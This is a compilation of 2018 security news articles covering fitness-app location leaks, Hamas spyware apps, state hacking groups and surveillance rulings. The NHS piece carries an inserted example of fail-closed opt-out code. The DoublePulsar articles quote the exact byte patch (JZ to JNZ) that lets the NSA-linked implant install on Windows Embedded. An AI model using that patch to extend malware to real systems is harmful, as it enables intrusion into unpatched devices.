"With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning," security researcher Foeke Postma said in a blog post Sunday after an investigation with the Dutch news organization De Correspondent.

"We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer's identity."

The investigation found detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea, the researchers said.

Polar said in a statement it was suspending the app's feature that allowed users to share data, while noting that any data made public was the result of users who opted in to location tracking.

"It is important to understand that Polar has not leaked any data, and there has been no breach of private data," the statement said.

It said the location tracking feature "is used by thousands of athletes daily all over the world to share and celebrate amazing training sessions."

According to De Correspondent, only about two percent of Polar users chose to share their data, but that nonetheless allowed anyone to discover potentially sensitive data from military or civilian personnel.

"We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea," the report said.

In January, the Pentagon said it was reviewing its policies on military personnel's use of fitness applications after Strava's map showed a series of military bases in Iraq as well as sites in Afghanistan.

Polar fitness app broadcasted sensitive data of intelligence and military personnel
11.7.2018 securityaffairs BigBrothers

The Mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel.
A new privacy incident involves fitness applications and the military: this time the mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel from 69 countries.

This is the second incident in a few months: in January experts discovered that military personnel worldwide had publicly shared online their exercise routes recorded through the fitness tracker Strava, revealing fitness sessions conducted inside or near military bases.

During the weekend, Dutch security experts revealed they were able to find data on some 6,000 individuals including military personnel from dozens of countries and FBI and National Security Agency personnel.

According to an investigation by the news website Bellingcat and the Dutch news agency De Correspondent, the fitness devices were leaking data belonging to military or intelligence officials, which could be exploited by threat actors to spy on them.

“With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning,” explained the security researcher Foeke Postma, who investigated the case with the Dutch news outlet De Correspondent.

“We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer’s identity.”


The experts discovered detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea.

The exposure of such data poses serious risks to the military personnel as reported in a post published by Defensenews.com.

“Bellingcat was able to pinpoint the name of a “high-ranking officer” at a base known to host nuclear weapons. It took just a few clicks. Using the Polar Flow app and other information found on the internet, De Correspondent was able to collect a disturbing amount of one Dutch soldier’s personal information.” reads the blog post published by Defensenews.com.

“They found the name of the soldier, the fact he was stationed at one of the key locations where the war against the Islamic State is being waged from, the soldier’s home address, and the names of his wife and kids.”

In response to the privacy incident, Polar has disabled the feature that allowed users to share data and pointed out that any data made public was the result of users who opted in to location tracking.

The company has already implemented a number of measures to mitigate the exposure of its users, along with the suspension of the Flow Explore feature until further notice.

The location tracking feature allows thousands of athletes all over the world to share data related to their training sessions every day.

“If there hasn’t been a data breach, why have you suspended the Explore feature?

While the decision to opt-in and share training sessions and GPS location data is the choice and responsibility of the customer, we are aware that potentially sensitive locations were appearing in public data, and have made the decision to suspend the Explore until further notice.” reads the statement published by Polar.

“I have seen statements that suggest that Polar leaked data – Did Polar leak any data? Contrary to what has been reported, it’s important to clarify that Polar has not leaked any data. Furthermore, there has been no breach of private data.”

The De Correspondent investigation revealed that only about two percent of Polar users chose to share their data, but journalists and experts were still able to collect sensitive data on military and civilian personnel.

“We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea,” states the De Correspondent report.

Chinese hackers breached systems at Australian National University … and are still there
6.7.2018 securityaffairs BigBrothers

Chinese hackers breached the systems of Australian National University (ANU) and, according to the experts, they are still there.
Chinese hackers continue to target organizations worldwide; this time attackers based in China breached the systems of Australian National University (ANU), one of the most prestigious Australian universities.

The bad news is that experts are still working to lock the hackers out because the threat is still active in the network of the Australian University.

“The ABC has been told the Australian National University (ANU) system was first compromised last year.” reported ABC News.

The ANU had been working with intelligence agencies for several months to contain the threat and minimize its impact.

“The university has been working in partnership with Australian government agencies for several months to minimise the impact of this threat, and we continue to seek and take advice from Australian government agencies,” reads the official statement published by the Australian National University.

“Current assessments indicate no staff, student or research information has been taken and counter-measures are being undertaken.”


The Cyber Security Minister Angus Taylor pointed out that the Australian Government “condemns any malicious activity” that targets the systems of the country.

“We know that nation states and criminal groups actively target research and tertiary institutions to steal the intellectual property of hardworking Australians,” he said.

“Malicious cyber activity against Australia’s national interests, whether from criminal syndicates or foreign states, is increasing in frequency, sophistication and severity, and the Australian Government’s highest priority is ensuring Australians are safe and our interests are secure.”

Mr Taylor confirmed that the Australian Cyber Security Centre (ACSC) had been supporting ANU in this case.

“The Australian Cyber Security Centre works closely with any affected organisations to reduce the likelihood of threat actors being successful and to help them recover when they are compromised,” he said.

Australian systems are regularly targeted: in October 2016 a report published by the Australian Cyber Security Centre confirmed that the Australian Bureau of Meteorology hack was carried out by foreign cyber spies.

In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) was hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, it is the analog of the USA’s National Weather Service.

The supercomputer of the Australian Bureau of Meteorology targeted by the hackers is also used to provide weather data to defense agencies; compromising it could give a persistent attacker a significant advantage for numerous reasons.

Initial media reports blamed China for the cyber attack. In 2013 Chinese hackers had been accused by authorities of stealing the top-secret documents and plans of Australia’s new intelligence agency headquarters.

Hamas cyber-operatives lure Israeli soldiers to spyware hidden in tainted apps
6.7.2018 securityaffairs BigBrothers

Israeli military intelligence accused Hamas operatives of creating tainted apps to lure soldiers into downloading spyware onto their phones.
According to a report published by the Israeli military, Hamas hackers are attempting to lure Israel Defence Forces (IDF) soldiers into installing tainted apps on their devices.

The Israeli military had already blamed Hamas for similar attacks, but this time the hackers managed to serve the apps through the official Google Play Store to increase the likelihood of success.

The experts from the Israeli firm ClearSky have identified the following apps:

WinkChat – com.winkchat.apk (dating app)
GlanceLove – com.coder.glancelove.apk (dating app)
Golden Cup – anew.football.cup.world.com.worldcup.apk (World Cup app)

Hamas operatives created a number of fake Facebook profiles using photos of attractive women to lure IDF soldiers into private conversations, then trick them into installing one of the compromised apps.

Israeli military officials explained that Hamas operatives adopted the same tactic in a campaign launched in January.

In January, the hackers used the profile of a woman named “Elianna Amer”; in the latest attacks, which lasted at least three months, they used the profile of a woman named “Lina Kramer.”

“I got a message on Facebook that looked innocent at first, from someone named Lina Kramer, we started talking on Facebook, then we moved to Whatsapp, and then she asked me to download an app called GlanceLove,” explained a former IDF soldier.

“At this stage, my suspicion was final, and I decided to consult a friend who helped me understand that it was a fictitious profile with malicious intentions. From there I turned to the information security officer in my unit who helped me.”

According to Israeli army intelligence officers, the attacks failed to damage military security.

“No damage was done, as we stopped it in time,” one of the officers said.

The Israeli newspaper Haaretz provided a different version of the facts, reporting that at least “hundreds” of soldiers were infected.

“Hamas managed to hack into the phones of hundreds of Israeli soldiers using dating and World Cup apps and managed to gather sensitive information about the military and some of its bases around the Gaza strip.” reported Haaretz.

“The apps allowed malicious software controlled by Hamas to be planted into Android smartphones, enabling militants in the Strip to access pictures, phone numbers and email addresses of soldiers posted close to the border, and even allowed Hamas to control the phones’ cameras and microphones remotely.”

The analysis of the apps revealed they were tainted with spyware that can take over devices and exfiltrate sensitive data.

According to the experts, the threat actor behind these attacks is codenamed Arid Viper.

In 2015, security experts at Trend Micro uncovered a cyber espionage campaign, dubbed Operation Arid Viper, that targeted Israeli institutions. Operation Arid Viper was run by Arabic-speaking hackers who sought to extract sensitive documents by sending phishing emails. The phishing campaigns targeted government offices, infrastructure providers, a military organization, and academic institutions in Israel and Kuwait.

In the past, security experts linked Hamas operatives to another APT tracked as Gaza Cybergang (Gaza Hackers Team or Molerats).

NHS Digital Erroneously Reveals Data of 150,000 Patients
5.7.2018 securityweek BigBrothers

On Monday July 2, Jackie Doyle-Price, the parliamentary under-secretary of state for health, delivered a written statement to the UK parliament. It explained that 150,000 NHS patients who had specifically opted out of the NHS patient data-sharing regime were in fact not opted out.

"As a result," says the statement, "these objections were not upheld by NHS Digital in its data disseminations between April 2016, when the NHS Digital process for enabling them to be upheld was introduced, and 26 June 2018. This means that data for these patients has been used in clinical audit and research that helps drive improvements in outcomes for patients."

NHS Digital is the national information and technology partner to the health and social care system. It has responsibility for standardizing, collecting and publishing data and information from across the health and social care system in England. It is therefore responsible for storing and disseminating NHS patient data to those qualified to receive it.

On the same day, NHS Digital released its own statement. "We apologize unreservedly for this issue, which has been caused by a coding error by a GP system supplier (TPP) and means that some people's data preferences have not been upheld when we have disseminated data. The TPP coding error meant that we did not receive these preferences and so have not been able to apply them to our data."

It seems that a software error in an application named SystmOne, written by software firm TPP and designed to allow patients to opt out of data sharing at their local NHS surgery, failed to record the objections. Those objections were therefore not relayed to NHS Digital. Since the system relies on patients opting out rather than opting in to data sharing, NHS Digital assumed that all patients had agreed.
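The failure mode described here is a fail-open default: the dissemination step treated the absence of an objection record as consent, so a feed that silently dropped objections produced the same output as a feed in which nobody had objected. The block below is an added example and not code from TPP, NHS Digital or SystmOne; the patient identifiers, the preference feed and the function names are constructed. It contrasts the defective pattern with a fail-closed filter that shares only on an explicit "no objection" record and reports patients whose preference never arrived, plus a completeness check on the feed itself.

```python
"""Fail-open vs fail-closed handling of missing opt-out records
(added example; all identifiers and data are constructed)."""

# Constructed GP register: every patient the dissemination run covers.
PATIENTS = ["P1", "P2", "P3", "P4"]

# Constructed preference feed received from the GP system.
# True = patient objected (do not share), False = no objection recorded.
# P3 and P4 objected at the surgery, but an upstream error dropped their
# records, so they never reach this stage at all.
PREFERENCES_RECEIVED = {"P1": False, "P2": True}


def select_fail_open(patients, prefs):
    """The defective pattern: a patient with no preference record is
    treated exactly like a patient who explicitly did not object."""
    return [p for p in patients if not prefs.get(p, False)]


def select_fail_closed(patients, prefs):
    """Hardened pattern: share only when an explicit False (no objection)
    record exists. Patients with no record are withheld and returned
    separately so the gap can be reconciled with the source system."""
    shared, unresolved = [], []
    for p in patients:
        pref = prefs.get(p)
        if pref is None:
            unresolved.append(p)
        elif pref is False:
            shared.append(p)
        # pref is True: objection upheld, nothing to do
    return shared, unresolved


def missing_preferences(expected_ids, prefs):
    """Feed completeness check: IDs the register says exist but for which
    no preference record (of either value) was received. A non-empty
    result should block the run, not merely be logged."""
    return [p for p in expected_ids if p not in prefs]


def run_dissemination(patients, prefs):
    """Gate a dissemination run on feed completeness, then fail closed.
    Returns (shared_ids, withheld_ids, run_allowed)."""
    gap = missing_preferences(patients, prefs)
    shared, unresolved = select_fail_closed(patients, prefs)
    return shared, unresolved, not gap


if __name__ == "__main__":
    print("fail-open would share:", select_fail_open(PATIENTS, PREFERENCES_RECEIVED))
    shared, withheld, ok = run_dissemination(PATIENTS, PREFERENCES_RECEIVED)
    print("fail-closed shares:", shared, "withheld:", withheld, "run allowed:", ok)
```

The completeness check is the piece that would have surfaced this defect at the first run rather than after three years: a register of N patients paired with a feed of fewer than N preference records is a reconciliation failure regardless of what the missing records would have said.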

The software error was detected on 28 June, three years after SystmOne was released, when TPP switched to a new system. Neither Jackie Doyle-Price nor NHS Digital has given figures on how many times this data might have been erroneously shared externally during this period. However, NHS Digital compiles and publishes a register of organizations that receive patient data. The most recent publication (XLS) covers the period from December 2017 to February 2018. It shows that patient data was shared more than 5,300 times in these three months.

It also shows where the data shared is considered to be sensitive or non-sensitive, and whether the data was anonymized or is identifiable. The anonymization is performed in accordance with the UK data protection regulator's requirements; but many privacy activists do not believe that anonymization is irreversible.

"As part of our commitment to the secure and safe handling of health data, on 25 May 2018 [the date on which GDPR became required] the Government introduced the new national data opt-out. The national data opt-out replaces Type 2 objections. This has simplified the process of registering an objection to data sharing for uses beyond an individual's care. The new arrangements give patients direct control over setting their own preferences for the secondary use of their data and do not require the use of GP systems, and therefore will prevent a repeat of this kind of GP systems failure in the future."

It remains an opt-out of data sharing rather than an opt-in to data sharing -- the latter being generally required by GDPR.

Dr John Parry, Clinical Director at TPP, said: "TPP and NHS Digital have worked together to resolve this problem swiftly. The privacy of patient data is a key priority for TPP, and we continually make improvements to our system to ensure that patients have optimum control over information. In light of this, TPP apologizes unreservedly for its role in this issue."

NHS Digital added, "We are confident that we are now respecting all opt-outs that have been recorded in the system. We will also be contacting organizations with whom we have shared data that may have been affected, and work with them to destroy the data where possible."

In an emailed comment, Mike Smart, a security strategist at Forcepoint, told SecurityWeek, "In this case, it appears the underlying program left patient data exposed, even though each party involved in handling the data was aware of the privacy policy settings. It's a clear indicator that relying too heavily on software will cause these mistakes to happen in the future. We can't afford to leave out the human element when deciding how we protect sensitive data, and must involve creative and lateral thinking in the testing and final checking stage before software goes live."

Israel Accuses Hamas of Targeting Soldiers With World Cup App
4.7.2018 securityweek BigBrothers

Tel Aviv - Israeli military intelligence on Tuesday accused Hamas hackers of creating a World Cup app and two online dating sites to tempt soldiers into downloading spyware onto their phones.

Briefing journalists at national defence headquarters in Tel Aviv, army intelligence officers said the scam by members of the Palestinian Islamist movement that runs the Gaza Strip failed to damage military security.

"No damage was done, as we stopped it in time," one of the officers said, with the military's response codenamed "Operation Broken Heart".

But he said the attempt showed the Islamist militants had adopted new tactics since a similar attempt was revealed in January 2017.

The emphasis then was solely on the dating game, with the hackers posing online as attractive young women seeking to lure men in uniform into long chats.

This time the traps were aimed at both sexes and there was the additional bait of World Cup action with an app offering "HD live streaming of games, summaries and live updates".

Attackers used stolen identities to create more convincing fake Facebook profiles of young Israelis, written in fluent Hebrew studded with current slang.

"What Hamas is bringing to the table is a very good knowledge of our young people and their state of mind," another officer said. Asked how he could be sure Hamas was behind the online offensive, he declined to say but insisted there was no doubt.

The assailants uploaded their custom-built Golden Cup, Wink Chat and Glance Love applications to the Google Store, to make them seem legitimate, according to the officers.

Using Facebook sharing and Whatsapp messages, they urged young men and women performing Israel's compulsory military service to download the infected apps.

Once on the recipient's phone, officers said, the device could be taken over to covertly take and send photographs, eavesdrop on conversations, copy stored files and pictures and transmit location details.

But in most cases, they said, soldiers did not download the apps and informed their superiors of their suspicions.

Google has since deleted the apps from its store, they added.

They said that awareness of the potential risk had soared since the army publicised the previous attempts.

"Thanks to the soldiers' vigilance, Hamas' intelligence infrastructure was exposed before it caused actual security damage," army briefing notes said. Israel and Palestinian militants in Gaza have fought three wars since 2008.

In March 2016 a Palestinian from Gaza was charged with hacking into Israeli military drones.

Iranian Hackers Impersonate Israeli Security Firm
4.7.2018 securityweek BigBrothers

A group of Iranian hackers focused on cyber-espionage recently set up a website impersonating ClearSky Cyber Security, the Israeli firm that exposed their activities not long ago.

The hackers, tracked as APT35 and also known as NewsBeef, Newscaster, and Charming Kitten, have been active since at least 2011, with their activities detailed for the first time several years ago.

In December 2017, ClearSky Cyber Security published a report detailing the group’s activities during the 2016-2017 timeframe. The security firm not only described the actor’s infrastructure, but also provided information on DownPaper, a new piece of malware the hackers had been using.

The security firm exposed the link between the group and Behzad Mesri, also known as Skote Vahshat, who was charged in November 2017 with the hacking of HBO. Furthermore, the researchers also managed to establish the identity of two other alleged members of the group.

Roughly half a year after the report was published, the security firm announced on its Twitter account that the hackers built their own site impersonating ClearSky.

“#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com),” the security firm announced.

The advanced persistent threat (APT) apparently copied entire pages from the legitimate website, but also changed one of them to include a sign in option with multiple services. Anyone entering credentials there would have had them sent to the actor instead.

“These sign in options are all phishing pages that would send the victim's credentials to the attackers. Our legitimate website does not have any sign in option. It seems that the impersonating website is still being built because some of the pages have error messages in them,” the security firm announced.

One of the pages on the fake website, the security researchers discovered, featured content related to a Charming Kitten campaign that ClearSky exposed only several weeks ago. That page, however, wasn’t customized to look like the security firm’s website.

The fake website started being flagged as deceptive soon after ClearSky discovered it. The security firm says that its employees, services, and customers were not affected.

Over the past years, security researchers managed to link various hacking groups to Iran, including APT33, Rocket Kitten, Magic Hound, and CopyKittens, and even revealed that they tend to share infrastructure and malware code.

NSA began deleting all call detail records (CDRs) acquired since 2015
3.7.2018 securityaffairs BigBrothers

NSA is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities.
The US National Security Agency announced it is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities in some data received from telecommunications service providers.

“Consistent with NSA’s core values of respect for the law, accountability, integrity, and transparency we are making public notice that on May 23, 2018, NSA began deleting all call detail records (CDRs) acquired since 2015 under Title V of the Foreign Intelligence Surveillance Act (FISA)” reads the announcement published by the NSA.

“NSA is deleting the CDRs because several months ago NSA analysts noted technical irregularities in some data received from telecommunications service providers.”

Title V of the Foreign Intelligence Surveillance Act (FISA) and the USA Freedom Act of 2015 allow the intelligence agencies to collect call metadata related to certain types of calls involving persons of interest whose activity may pose a threat to homeland security.

The National Security Agency received more call detail records (CDRs) than it was allowed to retain under the current legal framework.

The NSA decided to destroy the data because it was infeasible to identify and isolate the properly produced records from the irregular ones.

“Consequently, NSA, in consultation with the Department of Justice and the Office of the Director of National Intelligence, decided that the appropriate course of action was to delete all CDRs. NSA notified the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice of this decision.” continues the announcement.

The National Security Agency started to delete malformed CDRs on May 23, this year, more than a month ago.


The intelligence agency also confirmed that it has addressed the root cause of the problem for future CDR acquisitions.

The National Security Agency reported the problem to the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice, which in turn notified the Foreign Intelligence Surveillance Court.

This isn’t the first time such an incident has occurred: civil liberties journalist Marcy Wheeler published last year a catalog of all the times the National Security Agency had violated FISA since the Stellar Wind phone dragnet went under FISA in 2004.

Russia Expert to Lead Canada's Electronic Eavesdropping Agency
29.6.2018 securityweek  BigBrothers

A Russia expert was appointed Wednesday to lead Canada's electronic eavesdropping agency, amid ongoing concerns of Russian hacking and meddling in Western elections.

Shelly Bruce moves up from number two at the Communications Security Establishment (CSE) to replace her former boss, outgoing CSE head Greta Bossenmaier.

Bruce studied Russia and Slavic languages at university before joining the CSE in 2004 as director of intelligence, and quickly moved up the ranks.

Her appointment as the head of the CSE comes only two months after Ottawa moved to safeguard Canada's elections from cyber threats and "foreign interference," following accusations of Russia meddling in the last US election, which Russia has denied.

Canada's next federal election is scheduled for 2019.

Also in April, G7 foreign ministers called on Russia to come clean about a nerve agent attack on a former spy in Britain, calling it in a joint statement "a threat to us all."

Western nations had a month prior expelled 150 Russian diplomats in a coordinated action against Moscow in support of Britain, and Russia retaliated with similar moves.

They included four diplomats serving at either Russia's embassy in Ottawa or its consulate in Montreal who were "identified as intelligence officers or individuals who have used their diplomatic status to undermine Canada's security or interfere in our democracy," Foreign Minister Chrystia Freeland said then.

Canada is a member of the US-led Five Eyes intelligence gathering alliance.

The CSE last year urged Ottawa to step up its hacking countermeasures, after identifying between 2013 and 2015 approximately 2,500 state-sponsored hacking attempts.

Ops … the DoublePulsar NSA-Linked implant now works also on Windows Embedded devices
28.6.2018 securityaffairs BigBrothers

This is very bad news for the security community: the NSA-linked DoublePulsar implant can now target Windows Embedded devices.
The DoublePulsar implant was released publicly in April 2017 by the Shadow Brokers, the hacker group that allegedly stole it from the NSA.

The hackers leaked a huge trove of hacking tools and exploit code used by the US intelligence agency; most of the Windows exploits had been addressed by Microsoft the month before.

DoublePulsar is a sophisticated SMB backdoor that allows attackers to control infected systems. Since its leak it has worked on almost any Windows system, except for devices running a Windows Embedded operating system.

The news of the day is that a security researcher who uses the online moniker Capt. Meelo has developed a version of the DoublePulsar implant that also works on devices running a Windows Embedded operating system.

The researcher discovered that even though devices running a Windows Embedded operating system are vulnerable to the exploits, the relevant Metasploit modules wouldn’t work on them.

To confirm this hypothesis, the researcher used the NSA FuzzBunch exploit code and found that the target device was indeed vulnerable to the EternalBlue exploit.

“I then quickly used the EternalBlue module and the result was successful – the backdoor was successfully installed on the target. So I guessed the authors of the MSF exploit modules just forgot to add the support for Windows Embedded version.” wrote the expert in a blog post.

“Since the backdoor was already installed, the last thing that needs to be done to complete the exploitation and gain a shell was to use DoublePulsar.”

Summing up, the expert was able to run the EternalBlue attack against the target device, but the deployment of the DoublePulsar backdoor kept failing, so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

The expert used @stalkr_’s script (https://stalkr.net/files/ida/idadif.py) to apply the patch to the exe file and then moved the modified Doublepulsar-1.3.1.exe back to its original location.

This trick allowed him to inject the generated DLL payload into the target host.

France Also Interested in Greece's Russian Bitcoin Suspect
28.6.2018 securityweek BigBrothers

France has joined the US and Russia in seeking the extradition of a Russian held in Greece for allegedly laundering $4 billion using the bitcoin digital currency, a court source said Wednesday.

The French warrant says Alexander Vinnik, who headed bitcoin exchange BTC-e, had defrauded over 100 people in six French cities between 2016 and 2018.

He is sought for extortion, money laundering and crimes committed online, the court source said.

Vinnik has been held in jail since his arrest last July in the northern Greek tourist resort of Halkidiki. He denies the accusation.

He was indicted by a US court last year on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

Greece's Supreme Court in December said Vinnik should be extradited to the US, but the final decision is up to the Greek justice minister.

Russia has also filed a demand to extradite Vinnik so he can stand trial on separate fraud charges.

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges.

According to the US indictment, it was "heavily reliant on criminals".

In addition, BTC-e "was noted for its role in numerous ransomware and other cyber-criminal activity".

It allegedly received more than $4 billion (3.5 billion euros) worth of Bitcoin over the course of its operation.

Vinnik was also charged with receiving funds from the infamous hack of Mt. Gox -- an earlier digital currency exchange that eventually failed, in part due to losses attributable to hacking.

The US Treasury Department has slapped BTC-e with a $110 million fine for "wilfully violating" US anti-money laundering laws. Vinnik himself has been ordered to pay $12 million.

In Russia, Vinnik is wanted on separate fraud charges totalling 9,500 euros.

He has said he would accept extradition to his home country.

NSA-Linked Implant Patched to Work on Windows Embedded
28.6.2018 securityweek BigBrothers

DoublePulsar, one of the hacking tools the Shadow Brokers supposedly stole from the National Security Agency (NSA)-linked Equation Group, can now run on Windows Embedded devices.

The backdoor was released publicly in April last year along with a variety of Windows exploits that Microsoft had patched the month before. It is a sophisticated, multi-architecture SMB (Server Message Block) backdoor that can stay well hidden on infected machines.

In addition to SMB, it is also used as the primary payload in RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software (an exploitation framework that resembles Rapid7’s Metasploit).

As it turns out, although it would work on a wide range of Windows releases, DoublePulsar wouldn’t work on devices running a Windows Embedded operating system, even though the platform itself is vulnerable to the NSA-linked exploits, a security researcher who uses the online handle Capt. Meelo says.

Windows Embedded, the researcher discovered, was indeed vulnerable to the exploits, but the relevant Metasploit modules wouldn’t work on it. Using FuzzBunch, however, he verified that the target device was indeed vulnerable via the EternalBlue exploit.

While exploitation via the EternalBlue module was successful, the installation of DoublePulsar failed, so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

Using a script from a security enthusiast who calls himself StalkR, he then patched the .exe file and moved the modified Doublepulsar-1.3.1.exe back to its original location. This resulted in a successful injection of the generated DLL payload into the target host.

North Korean Hackers Exploit HWP Docs in Recent Cyber Heists
26.6.2018 securityweek  BigBrothers

A series of malicious Hangul Word Processor (HWP) documents used in recent attacks on cryptocurrency exchanges have been attributed to the North Korea-linked Lazarus group, AlienVault reports.

The attacks appear to include the recent assault on Bithumb, the largest virtual currency exchange in South Korea, with more than 1 million customers. As part of the incident, hackers managed to steal over $30 million worth of cryptocurrencies.

Lazarus, or BlueNoroff, is a state-sponsored hacking group believed to have launched the $81 million cyber heist from the Bangladesh Bank in 2016 and considered the most serious threat against banks. Earlier this year, the group was observed hitting an online casino in Central America and switching interest to crypto-currency.

Earlier this month, AlienVault revealed that Lazarus has been leveraging a new ActiveX vulnerability in attacks on South Korean targets. Now, the security firm says that the hackers have also been using a series of malicious documents to target members of a recent G20 Financial Meeting.

AlienVault's security researchers analyzed three similar malicious documents that have already been associated with Lazarus. One of these mentions the G20 International Financial Architecture Working Group meeting, which seeks coordination of economic policies between the wealthiest countries.

The HWP files include malicious code that fetches next-stage malware (either a 32- or 64-bit version of Manuscrypt, which has already been detailed by other security researchers), a threat that disguises its communications as traffic to South Korean forum software. Decoy documents in the form of resumes were also included.

A series of reports within South Korea have already suggested that malicious HWP files were used earlier in May and June to set up the Bithumb heist, and that these documents appear linked to previous attacks by Lazarus.

The investigation of a South Korean security company into the thefts also revealed that fake resumes strikingly similar to those delivering the Lazarus-linked Manuscrypt were sent to cryptocurrency organizations.

“Whilst we can’t be certain this malware is responsible for the thefts from Bithumb, it seems a likely suspect,” AlienVault notes.

Related malicious HWP documents from Lazarus have been reportedly targeting crypto-currency users in South Korea earlier this month.

Furthermore, the researchers noticed cryptocurrency phishing domains registered to the same phone number as a domain (itaddnet[.]com) and delivering some of the malware. This would suggest the attackers are also phishing for credentials, in addition to delivering malware.

“It is unusual to see Lazarus registering domains - normally they prefer to compromise legitimate websites. So this would be an unusual attack if it is indeed run by members of Lazarus,” AlienVault says.

Apparently, it would be entirely possible for Lazarus to have hacked Bithumb earlier this month, considering that the group raided the exchange last year as well, which likely provided them with the necessary knowledge to do it again. Over the past year, the group targeted other crypto-currency exchanges as well.

“It’s clear that the thefts from Lazarus won’t stop anytime soon given the gains available - the (partially successful) attempt to steal $1 billion dollars from the Bank of Bangladesh represents 3% of North Korea’s reported GDP. Thefts from South Korean organizations have the double impact of weakening their closest competitor,” AlienVault said.

UK Tax Agency HMRC has recorded the voice tracks of 5.1 Million Brits
25.6.2018 securityaffairs BigBrothers

The UK-based privacy group Big Brother Watch revealed that the British tax agency HMRC has recorded the voice of over 5.1 million Britons.
The UK-based privacy and civil liberties group Big Brother Watch has revealed that the British tax agency HMRC (Her Majesty’s Revenue and Customs) has recorded the voice of over 5.1 million Britons.

Her Majesty’s Revenue and Customs collected these voice records via the Voice ID service that was launched in January 2017. The service was created to allow UK citizens to authenticate with their voice when calling HMRC call centers.

When the service was initially launched, the tax agency claimed users would be able to opt out of using it and continue to authenticate themselves by using usual methods.

The Big Brother Watch group discovered that there’s no opt-out option when users call the agency support line.

Every citizen accessing the service recorded a voice track for use with the Voice ID authentication feature.

“Far from ‘encouraging’ customers, HMRC offers no choice but to do as the automated system instructs and create a biometric voice ID for a Government database.” reads the Big Brother Watch report.

“In our investigation, we found that the only way to avoid creating a voice ID is to say “no” to the system – three times – before the system resolves to create your voice ID “next time”.”

Advocates at Big Brother Watch claim the HMRC is acting unlawfully because it doesn’t provide a clear way of opting out and because there is no way to ask the agency to remove a voice track from HMRC’s database.

Big Brother Watch filed freedom of information (FOIA) requests, but the tax agency refused to provide instructions to users on how to delete their voice tracks from HMRC’s database.


Another aspect that is still under investigation is how the agency manages voice tracks and if it shares them with third-parties and government agencies.

It is clear that Her Majesty’s Revenue and Customs is not in compliance with the GDPR regulation adopted by EU member states.

Big Brother Watch officials are inviting Britons to file a complaint with the HMRC and with the UK’s Information Commissioner’s Office (ICO); the latter has already started an official investigation into HMRC’s process.

Supreme Court of the US ruled that police need a warrant for mobile location data
24.6.2018 securityaffairs BigBrothers

The Supreme Court of the US ruled that police must obtain a search warrant before obtaining mobile location data from mobile carriers and similar services.
The Supreme Court of the United States ruled this week that law enforcement must obtain a search warrant before obtaining cell phone location information from mobile carriers or third-party services.

“When the government tracks the location of a cell phone it achieves near perfect surveillance, as if it had attached an ankle monitor to the phone’s user,” Chief Justice John Roberts wrote in the 5-4 opinion, as reported by The Wall Street Journal.

“Unlike the nosy neighbor who keeps an eye on comings and goings,” he wrote, the signal towers and processing centers that track cellphone users “are ever alert, and their memory is nearly infallible,” making analog-era precedents prosecutors cited to justify such warrantless searches all but obsolete.


The decision aims at preventing surveillance activities operated by the government and protecting the privacy of the citizens under the Fourth Amendment.

The Supreme Court ruled that a warrant is also needed to access location data stored by mobile carriers and similar companies, since this data makes it possible to monitor almost any activity of citizens.

“While individuals regularly leave their vehicles, they compulsively carry cell phones with them all the time. A cell phone faithfully follows its owner beyond public thoroughfares and into private residences, doctor’s offices, political headquarters, and other potentially revealing locales.” continues Chief Justice John Roberts.

“Critically, because location information is continually logged for all of the 400 million devices in the United States – not just those belonging to persons who might happen to come under investigation – this newfound tracking capacity runs against everyone.”

Of course, the authorities can still operate without a warrant when the lives of citizens are in danger or when handling national security issues.

The ruling came in the wake of the Timothy Carpenter v. US case, filed in 2011, when US police arrested members of a gang who committed armed robberies at several stores.

Gang members confessed that the group was led by Timothy Carpenter, a claim the police verified by obtaining a court order for Carpenter’s cell phone location information and confirming the suspect’s presence near the robberies.

Carpenter was sentenced to more than 100 years in prison, but lawyers for the American Civil Liberties Union, who represented him at the high court, called the decision “a truly historic vindication of privacy rights.”

